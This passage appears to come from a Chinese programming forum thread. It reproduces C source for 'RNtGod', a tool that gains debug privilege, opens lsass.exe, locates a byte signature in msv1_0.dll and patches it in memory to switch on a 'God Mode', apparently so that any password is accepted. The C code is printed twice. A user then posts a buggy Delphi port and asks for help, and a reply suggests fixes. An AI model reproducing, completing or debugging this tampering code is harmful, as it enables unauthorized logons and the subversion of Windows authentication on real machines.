#include "stdafx.h"
#include "windows.h"
#include "tlhelp32.h"
#include "stdio.h"// 提权函数
BOOL EnableDebugPriv(void)
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
BOOL bREt = FALSE; if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
}
}
CloseHandle(hToken);
return bREt;
}// 获取目标进程Pid
DWORD GetTargetPid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe; hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pe.dwSize = sizeof(pe);
b=Process32First(hnd, &pe);
while(b)
{
if (lstrcmpi(pn, pe.szExeFile) == 0)
return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
} return 0;
}// 获取特征码偏移
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr; hLib = LoadLibrary(dn);
if ( hLib )
{
// 特征码校验
__asm
{
push ebx
mov dword ptr [ebx], eax
xor eax, eaxcheck_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49
je short check_2_start
check_1_end:
inc dword ptr [ebx]
jmp short check_1_startcheck_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp short check__overcheck_2_end:
inc dword ptr [ebx]
jmp short check_2_startcheck__over:
xor eax, eax
pop ebx
} } else
{
printf("Failt to found the Sinature offset.\n");
return -1;
} dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib); return dwSinatureAddr;
}// 获取msv1_0.dll在内存中的基址
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
DWORD dwModBase = NULL;
HANDLE hModuleSnap;
MODULEENTRY32 lpModInfo = {0};
BOOL bModule = NULL; lpModInfo.dwSize = sizeof(lpModInfo);
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid);
bModule = Module32First(hModuleSnap, &lpModInfo); while ( bModule )
{
if (lstrcmpi(dn, lpModInfo.szModule) == 0)
{
dwModBase = (DWORD)lpModInfo.modBaseAddr;
//printf("%x\n", dwModBase);
break;
}
Module32Next(hModuleSnap, &lpModInfo);
} CloseHandle(hModuleSnap);
return dwModBase;
}// 虚拟地址转换
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
return (dwSinatureAddr + dwModBase);
}// 去密码函数
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10";
char buff2[] = "\x32\xC0";
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid); VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid); if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
} VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}// 版权函数
void CopyRightInfo()
{
printf("------------------------------------------\n");
printf("RNtGod\n");
printf("Author: Cyg07\n");
printf("Reverse from golds7n[LAG]'s NtGod\n");
printf("------------------------------------------\n");
}
int main(int argc, char* argv[])
{
CopyRightInfo(); if (argc < 2)
{
printf("Usage: %s On|OFF\n\n", argv[0]);
return 0;
} char *DllName = "msv1_0.dll"; // Dll
char *ProcessName = "lsass.exe"; // 进程
DWORD dwModBase = NULL; // dll在内存中的基地址
DWORD dwSinatureAddr = NULL; // 特征码偏移
DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址 dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移 if ( EnableDebugPriv() == NULL ) // 进程提权
{
printf("Failt to enable debug priv.\n");
}
DWORD dwTargetPid = GetTargetPid(ProcessName); // 获取 lsass.exe 进程
// printf("%d\n", dwTargetPid); dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址 dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址 // 密码处理函数
FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr); return 0;
}
#include "windows.h"
#include "tlhelp32.h"
#include "stdio.h"// 提权函数
BOOL EnableDebugPriv(void)
{
HANDLE hToken;
HANDLE hProcess = GetCurrentProcess();
BOOL bREt = FALSE; if ( OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
{
TOKEN_PRIVILEGES tkp;
if ( LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid) )
{
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);
}
}
CloseHandle(hToken);
return bREt;
}// 获取目标进程Pid
DWORD GetTargetPid(char *pn)
{
BOOL b;
HANDLE hnd;
PROCESSENTRY32 pe; hnd = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pe.dwSize = sizeof(pe);
b=Process32First(hnd, &pe);
while(b)
{
if (lstrcmpi(pn, pe.szExeFile) == 0)
return pe.th32ProcessID;
b=Process32Next(hnd,&pe);
} return 0;
}// 获取特征码偏移
DWORD GetSinatureAddr(char *dn)
{
HMODULE hLib;
DWORD dwSinatureAddr; hLib = LoadLibrary(dn);
if ( hLib )
{
// 特征码校验
__asm
{
push ebx
mov dword ptr [ebx], eax
xor eax, eaxcheck_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x8B
jnz short check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x4D
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], 0x0C
jnz short check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], 0x49
je short check_2_start
check_1_end:
inc dword ptr [ebx]
jmp short check_1_startcheck_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], 0x32
jnz short check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], 0x0c0
jnz short check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp short check__overcheck_2_end:
inc dword ptr [ebx]
jmp short check_2_startcheck__over:
xor eax, eax
pop ebx
} } else
{
printf("Failt to found the Sinature offset.\n");
return -1;
} dwSinatureAddr = dwSinatureAddr - (DWORD)hLib;
//printf("%08x , %x\n", dwSinatureAddr, hLib);
FreeLibrary(hLib); return dwSinatureAddr;
}// 获取msv1_0.dll在内存中的基址
DWORD GetModBase (DWORD dwTargetPid, char *dn)
{
DWORD dwModBase = NULL;
HANDLE hModuleSnap;
MODULEENTRY32 lpModInfo = {0};
BOOL bModule = NULL; lpModInfo.dwSize = sizeof(lpModInfo);
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwTargetPid);
bModule = Module32First(hModuleSnap, &lpModInfo); while ( bModule )
{
if (lstrcmpi(dn, lpModInfo.szModule) == 0)
{
dwModBase = (DWORD)lpModInfo.modBaseAddr;
//printf("%x\n", dwModBase);
break;
}
Module32Next(hModuleSnap, &lpModInfo);
} CloseHandle(hModuleSnap);
return dwModBase;
}// 虚拟地址转换
DWORD GetSinatureViraddr(DWORD dwSinatureAddr, DWORD dwModBase)
{
return (dwSinatureAddr + dwModBase);
}// 去密码函数
void FuckPassword (char *checkbuff, DWORD dwTargetPid, DWORD dwSinatureVirAddr)
{
HANDLE hProcess = NULL;
char buff1[] = "\xB0\x10";
char buff2[] = "\x32\xC0";
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwTargetPid); VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, PAGE_READWRITE, &dwTargetPid); if ( lstrcmpi("on", checkbuff) == 0 )
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff1, 2, 0);
printf("Open God Mode");
}
else
{
WriteProcessMemory(hProcess, (void *)dwSinatureVirAddr, buff2, 2, 0);
printf("Close God Mode");
} VirtualProtectEx(hProcess, (void *)dwSinatureVirAddr, 2, dwTargetPid, &dwTargetPid);
}// 版权函数
void CopyRightInfo()
{
printf("------------------------------------------\n");
printf("RNtGod\n");
printf("Author: Cyg07\n");
printf("Reverse from golds7n[LAG]'s NtGod\n");
printf("------------------------------------------\n");
}
int main(int argc, char* argv[])
{
CopyRightInfo(); if (argc < 2)
{
printf("Usage: %s On|OFF\n\n", argv[0]);
return 0;
} char *DllName = "msv1_0.dll"; // Dll
char *ProcessName = "lsass.exe"; // 进程
DWORD dwModBase = NULL; // dll在内存中的基地址
DWORD dwSinatureAddr = NULL; // 特征码偏移
DWORD dwSinatureVirAddr = NULL; // 特征码的虚拟地址 dwSinatureAddr = GetSinatureAddr(DllName); // 获取特征码偏移 if ( EnableDebugPriv() == NULL ) // 进程提权
{
printf("Failt to enable debug priv.\n");
}
DWORD dwTargetPid = GetTargetPid(ProcessName); // 获取 lsass.exe 进程
// printf("%d\n", dwTargetPid); dwModBase = GetModBase(dwTargetPid, DllName); // 获取基地址 dwSinatureVirAddr = GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址 // 密码处理函数
FuckPassword(argv[1], dwTargetPid, dwSinatureVirAddr); return 0;
}
C的,直接就弄成DLL
在 Delphi里调用就成了
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,TlHelp32, ExtCtrls;type
TForm1 = class(TForm)
rg1: TRadioGroup;
Buttonbtn1: TButton;
Buttonbtn2: TButton;
procedure Buttonbtn1Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure Buttonbtn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;var
Form1: TForm1;
b:Boolean;
dwgetpid:DWORD;
implementation{$R *.dfm}procedure GetDebugPrivs; //提升权限
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
If(OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
begin
LookupPrivilegeValue(nil,'SeDebugPrivilege',tkp.Privileges[0].Luid);
tkp.PrivilegeCount := 1;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end; Function GetPID(_GetPID:PChar):DWORD;
var
h:thandle;
f:boolean;
lppe:tprocessentry32;
begin
h := CreateToolhelp32Snapshot(TH32cs_SnapProcess, 0);
lppe.dwSize := sizeof(lppe);
f := Process32First(h, lppe); //lppe.szExeFile是进程的名字,自己挑选你要的
//lppe.th32ProcessID就是你要的进程号
while integer(f) <> 0 do
begin
//if lppe.szExeFile='QQ.exe' then showmessage('ok');
if lppe.szExeFile = _GetPID then
begin
Result:=lppe.th32ProcessID;
break;
end;
f := Process32Next(h, lppe);
end;
end;function GetSinatureAddr(dn:PChar):DWORD; // 获取特征码偏移
var
hLib: HMODULE;
dwSinatureAddr:DWORD;
begin
hLib:= LoadLibrary(dn);
if (hLib <> 0) then
begin
asm // 特征码校验
push ebx
mov dword ptr [ebx], eax
xor eax, eax@check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $8B
jnz @check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $4D
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], $0C
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], $49
je @check_2_start
@check_1_end:
inc dword ptr [ebx]
jmp @check_1_start@check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $32
jnz @check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $0c0
jnz @check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp @check__over@check_2_end:
inc dword ptr [ebx]
jmp @check_2_start@check__over:
xor eax, eax
pop ebx
end;
end
else
begin
ShowMessage('Failt to found the Sinature offset.\n');
Result:= Result - 1;
end;
dwSinatureAddr:= dwSinatureAddr - hLib;
FreeLibrary(hLib);
Result:= dwSinatureAddr;
end;function GetModuleHandle2(ProcessID:Dword;sDllName: string):DWORD; // 获取msv1_0.dll在内存中的基址
var
th32handle: THandle;
me32:TModuleEntry32;
finded : Boolean;
begin
finded := False;
th32handle:=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);
if th32handle = INVALID_HANDLE_VALUE then Exit;
me32.dwSize := sizeof(TModuleEntry32);
if Module32First( th32handle,me32 ) then
repeat
if AnsiStricomp(PChar(ExtractFilename(me32.szExePath )), PChar(ExtractFilename(sDllName))) = 0 then
begin
Result := me32.hModule ;
break;
end;
until not Module32Next(th32handle,me32);
end;function GetSinatureViraddr(dwSinatureAddr,dwModBase:Dword):Dword; //虚拟地址转换
begin
Result:= dwSinatureAddr + dwModBase;
end;procedure FuckPassWord(checkbuff:Pointer;dwTargetpid:DWORD;dwSinatureViraddr:DWORD);
var
hProcess: THandle;
lpNumberOfBytes:DWord;
const
buff1: array[0..1] of Byte = ($B0,$10); //
buff2: array[0..1] of Byte = ($32,$10);begin
lpNumberOfBytes:= 0;
hProcess:= OpenProcess(PROCESS_ALL_ACCESS,False,dwTargetpid);
VirtualProtectEx(hProcess,ptr(dwsinatureviraddr),2,PAGE_READWRITE,ptr(dwTargetpid));
if b then
begin
WriteProcessMemory(hProcess,Ptr(dwSinatureViraddr),@buff1,2,lpNumberOfBytes);
ShowMessage('Open God Mode');
end
else
begin
WriteProcessMemory(hProcess,Ptr(dwSinatureViraddr),@buff2,2,lpNumberOfBytes);
ShowMessage('Close God Mode');
end;
end;
procedure TForm1.Buttonbtn1Click(Sender: TObject);
var
DllName:pchar; // Dll
ProcessName:PChar; // dll在内存中的基地址
dwModBase: DWORD; // dll在内存中的基地址
dwSinatureAddr: DWORD; // 特征码偏移
dwSinatureVirAddr: DWORD; // 特征码的虚拟地址begin b:= True;
DllName:= 'msv1_0.dll';
ProcessName:='lsass.exe';
dwSinatureAddr:= GetSinatureAddr(DllName); // 获取特征码偏移
GetDebugPrivs; //进程提权
dwgetpid:= GetPID(ProcessName); // 获取 lsass.exe 进程
dwModBase:= GetModuleHandle2(dwgetpid, DllName);// 获取基地址
dwSinatureVirAddr:= GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址
FuckPassword(nil,dwgetpid,dwSinatureVirAddr); // 密码处理函数
end;procedure TForm1.FormCreate(Sender: TObject);
begin
b:= False;
end;procedure TForm1.Buttonbtn2Click(Sender: TObject);
var
DllName:pchar; // Dll
ProcessName:PChar; // dll在内存中的基地址
dwModBase: DWORD; // dll在内存中的基地址
dwSinatureAddr: DWORD; // 特征码偏移
dwSinatureVirAddr: DWORD; // 特征码的虚拟地址begin
b:= False;
DllName:= 'msv1_0.dll';
ProcessName:='lsass.exe';
dwSinatureAddr:= GetSinatureAddr(DllName); // 获取特征码偏移
GetDebugPrivs; //进程提权
dwgetpid:= GetPID(ProcessName); // 获取 lsass.exe 进程
dwModBase:= GetModuleHandle2(dwgetpid, DllName);// 获取基地址
ShowMessage(IntToStr(dwModBase));
dwSinatureVirAddr:= GetSinatureViraddr(dwSinatureAddr, dwModBase); // 转换特征码在内存的虚拟地址
FuckPassword(nil,dwgetpid,dwSinatureVirAddr); // 密码处理函数
end;end.
自己翻译的,虽然编译通过,但问题好多,求大神帮助
也和我以前一样,翻译VC++到DELPHI啊?!
var
hLib: HMODULE;
dwSinatureAddr:DWORD;
begin
hLib:= LoadLibrary(dn);
if (hLib <> 0) then
begin
asm // 特征码校验
push ebx
mov dword ptr [ebx], hLib
xor eax, eax@check_1_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $8B
jnz @check_1_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $4D
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 2
cmp byte ptr [eax], $0C
jnz @check_1_end
mov eax, dword ptr [ebx]
add eax, 3
cmp byte ptr [eax], $49
je @check_2_start
@check_1_end:
inc dword ptr [ebx]
jmp @check_1_start@check_2_start:
mov eax, dword ptr [ebx]
cmp byte ptr [eax], $32
jnz @check_2_end
mov eax, dword ptr [ebx]
inc eax
cmp byte ptr [eax], $0c0
jnz @check_2_end
mov eax, dword ptr [ebx]
push eax
lea eax, dwSinatureAddr
pop dword ptr [eax]
mov eax, dword ptr [ebx]
jmp @check__over@check_2_end:
inc dword ptr [ebx]
jmp @check_2_start@check__over:
xor eax, eax
pop ebx
end;
end
else
begin
ShowMessage('Failt to found the Sinature offset.\n');
Result:= Result - 1;
end;
dwSinatureAddr:= dwSinatureAddr - hLib;
FreeLibrary(hLib);
Result:= dwSinatureAddr;
end;把eax传值,直接改为变量~~
再看看~~
第二个参数不对吧~~if ( lstrcmpi("on", checkbuff) == 0 )问题太多,我闪了~~